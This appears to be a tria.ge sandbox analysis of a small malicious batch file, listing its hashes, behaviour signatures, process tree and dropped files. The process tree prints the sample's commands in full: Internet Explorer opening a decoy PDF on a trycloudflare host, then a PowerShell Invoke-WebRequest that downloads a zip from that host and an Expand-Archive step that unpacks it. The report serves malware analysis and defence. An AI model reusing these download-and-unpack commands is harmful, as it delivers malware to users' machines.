Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
278s -
max time network
190s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
16/05/2024, 10:37
General
-
Target
basbasbas.bat
-
Size
1KB
-
MD5
ddd451685225b980bb2e0789090d3ff5
-
SHA1
cafbfce346a90aef87782e8ff87a626e5ffa6b05
-
SHA256
1bc72757a82f2f9c7bdf9a5d19de6f28c53ba3b4f8eba8dcb5f4590e7affae39
-
SHA512
78e4e8724522abe7170f2e26143fc72cd632eb23b8ba6499558ab1c37e430a53d4f37aeec9f93b6fb465c84e5a476057178ceb6f7f3c728c5c4c21dced02f0da
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Powershell Invoke Web Request.
-
Program crash 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 36 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 27 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\basbasbas.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://climb-items-macedonia-hometown.trycloudflare.com/a.pdf2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2764 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2764 CREDAT:209927 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 19844⤵
- Program crash
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for PDF to open (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://climb-items-macedonia-hometown.trycloudflare.com/qfv0ao.zip' -OutFile 'C:\Users\Admin\Downloads\qfv0ao.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\qfv0ao.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for PDF to open (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
299B
MD55ae8478af8dd6eec7ad4edf162dd3df1
SHA155670b9fd39da59a9d7d0bb0aecb52324cbacc5a
SHA256fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca
SHA512a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
Filesize
192B
MD5d2468863f243f66635ff291e3d310d2f
SHA172114766703d61dfa602df312f5b683d7b219634
SHA2569ad95c0fee78139b0e7afca6950e001428900774d8fb905d8716d529ff8330f2
SHA5120a6f0b5a53930d90b469277c0eadb5fa190ca6e297c88fad05f6d079e2bbe2e453006c5640816c38ad73bb90709ec7568d6c4b2700b8c7f23729f1ffefa2fb19
-
Filesize
192B
MD5fef26245b28238ccf5491dd965566568
SHA1dde007b893474362cbb606f0675ade37a17c09f2
SHA2568f46762c686ffa33c4788ed2e4de14660c8c6302f73963b6afc42f61864270b5
SHA512d9285e13c68acab36714e44d4a0d46b4b6acf0f117683e5ca155b31db7ce85b039e52fe1ed8dcaac53fd340f7464f9607677a9c0fc7f5aaad406732478d7a765
-
Filesize
252B
MD599a8785f39b5ed252fe85ed31d6fcdfb
SHA15a4de0c3ff882d1cef65cc165dd8f5958d71112c
SHA256965de85e545129de602a82fd0399bbbc9462688a174107cd91704b2b1373a155
SHA512cb55ec6da6404d7d99107ac40a98afe36c1696086424932256a5862ae048a6e9b84e1ff698afe9be78a4cb36617e444dc946409fe1897d890922ecae10d103e9
-
Filesize
344B
MD53d3f3970169891733516a462c19025d6
SHA176e4d5c31475465ca8f46bb05528aa4d7e1b5b27
SHA256bb7c0ded4dfdc4573eeba530f327ff800c5a659007c987e5997e4110191e1ff2
SHA5123bd7f46f954310e6125ee7ee5a90facc4b04c33d41950c5a553d02dfe381c056f9a48e27762b49980b80298008f25ed1133b44d790cba2a03c11dc66d513c110
-
Filesize
344B
MD5278d0880eaa270f1ef95889ca13af517
SHA11813de43c21689ddff97f646aa64b970c7749f00
SHA2568d7faff2a27cb59a6287a50423bd44456d7ac674a6497d14af290be70e98c636
SHA5124d15e46c21cdcabe24f12529f19f3113ea7076fc3a0ff139f52053f2a23291dba091c08f568ce061a08c7cadf0f931495e4dab4c18f3989353a046e2a687759a
-
Filesize
344B
MD550416df2d437856c5e5c265e2c90a3cd
SHA105d9761e8923f65f8e1b73cfd3879ac9e7311f64
SHA256b50d20bf86d70f9243d37c45a37d07854353de00192417451f131959afbb0397
SHA512f957ac8865d6a72ae1600d23673ef9aaf57aabc305f088d543d303a809c21b580858441a27456b264cc8e40d93fd9b93013ac16b0d8ad015a98075b66e10a4ef
-
Filesize
344B
MD52de58ac76154a8c27312961e9533c92d
SHA1d149311e70817aba4ff7df7ce08013251d18cd11
SHA256e5345d7849f99ead95d584cb87c05cf9c2a3ded758fdb254ce0099562cb40527
SHA5121ed9401634c3bb9ebcf65a1256003b814abf155e7c1fa8ed6cf4b7f0ba50639a725097744d040b045a69f6b7bb268284b494b21205c8376847419583d061a9f3
-
Filesize
344B
MD5c6c63de3f85566228ba22173555ad724
SHA139b9c123efc8e326782abaeb2ff92746168d35ed
SHA25607e0f607a4118dca0abe0fd5f1a05c2856bbf56ce028603d9689763af3e861ba
SHA512d609db623a7b1a1f0921ae9ba5c1f2cce1c9bc0c0b257371ec882edac2b63f47511d0791e8589be3a8bd7e2e692f26967586a9504e94bf1ad0c375d9e1d47619
-
Filesize
344B
MD5b79efff6d73ced5f9fdc042ce464b74f
SHA1e33787e55e5e49bc13902795b38f9083c98a1e98
SHA2563cde6168fb3165c81faaeb9449d38b95ac51728547440c6f5a5920c02bd5bf9c
SHA512b28fb1d768c4fd012590e872c22b23b47d9f331edcd86be88c9e9640bf35db6082b36bf621e921d682194b6bdf0d56ba5776ef4eefff350bc09a584541a12338
-
Filesize
344B
MD535dd74491108e5a93867236bb459ae0a
SHA149524ecd531ac710c1ba3370de675af46eea8d62
SHA2569b86d42cf588050211348ee93fc19559b8c61978180020ad57c72f73c91fbaf5
SHA512fa4c5b3e7a10a21836db87901de95ab9ed6a6881bf0d4c941f9b5b80ffec1e36225220a7ef5514ec47c9bd81630a6d64832199b7ec7e9096303f8383a03f44fe
-
Filesize
344B
MD50bb3c0892982290b9267b5c00d73759f
SHA1ede905839a127e4a7f08c92e6534a410f993b669
SHA2568a5997053d1849f3b494a7d54e7684400d915c272f20c6744f2c72038b0589ff
SHA5129ceefa81089190b26bf01db15408e8797bd6301b10a70cb731660d30868b7ad48e02cfa15a6ceba0ef6f682888cb252be9cb90a98064411e4118552443a9f10e
-
Filesize
344B
MD51b97002c7b6790a511f0387e0bf83f93
SHA1442facddb04ce9ac614bcd3a2bb86dc7286a471c
SHA25626839b221f3197607d6141cf404e7f6d1e4c9ca529c63bfeb1bff43815145af2
SHA512680dbf4fbc070f732f95f2c1040b4040ddc9467377ec5e38c3a7c11d8ee8769eb9834e9c8e154c235f5d9787e4c857edd947d9559debdc91443db7c9bcce88fb
-
Filesize
344B
MD573df9b724ef588139a3d9762badae12e
SHA1298c18b9e13686d399f57d2c2392aeeb57c69809
SHA25629ffbf903f533334bfe81a6ea88548e4beabfd9ae2d072a503d67fd6a2173c1b
SHA512b5929b9481bfb9ee8a9b79163f7f9e4c8a5ed81be6404c0402ed68717b0a1777f99367af851fe648867fbbaa8d07d7d9ec5b2c6da6d21efdbbaa69d18cb8f631
-
Filesize
344B
MD5eaa6da9f51ae59f00beb9496ee95f7e9
SHA1de1b88656d25f2a07765a24434713106828b6923
SHA25623951206d8a34ccde95a98e6969fefc7f483f369c3d8cf3f69215462ee6cc5af
SHA512fd6a9576ff6de8703f1a6d2e180b5f753ec43fe90d5f6143de276146872688aa83c218652fd5b047e1d545d20720b2ae4373fa46fe81d9d84dcb828a228c0069
-
Filesize
242B
MD53254be57b28840f51c9102b1b22e8119
SHA19f7487b01897f490e676748da9f0f8d22041f2ac
SHA256fde958d80fe6a891b3a1385e1b5c0669bc5858ca939a25302e2c8d4e81a113ca
SHA5123e9e3d29280644a567d6475440ff2df5fb79dd4218d68655cc7e53f82957d57c945267261a1a8ff23f865b9dac407e981846513522191b9f2a1b521803190f62
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
3KB
MD51aecd5457cfa92a474ddbafb361d4fa1
SHA1d24e05de04fd5d91ced7b029781f09606a6695d3
SHA256a25e45074580b27bdede5787a15d0a6d0465600396a54171bb970951ef3ad98d
SHA512aaddd9b52c3b3fb79cf98ba342dc10a776a4571afc483829d13bb10911d004bf748744aba7bba25f8c359059b9a39c5f34b438acab8d943285a2e014ec9af174
-
Filesize
7KB
MD586bed201e2c193dd11c83cbad8cbd50f
SHA10e44d5de63517ef6f3afa28d8265e47bd7697323
SHA256bf89cfbe7b28af7a7926045af897c85d8b13bb7e0c9861f8adb5d1a468093d23
SHA5126f180084695f8a798480fd8c9861785429c15694ac28d4d4fca2569db6c8e84b249a78b7b843f15406b36da4cf193c8253716f72dcfa6cfa2da0df2ef4ac1f5c
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB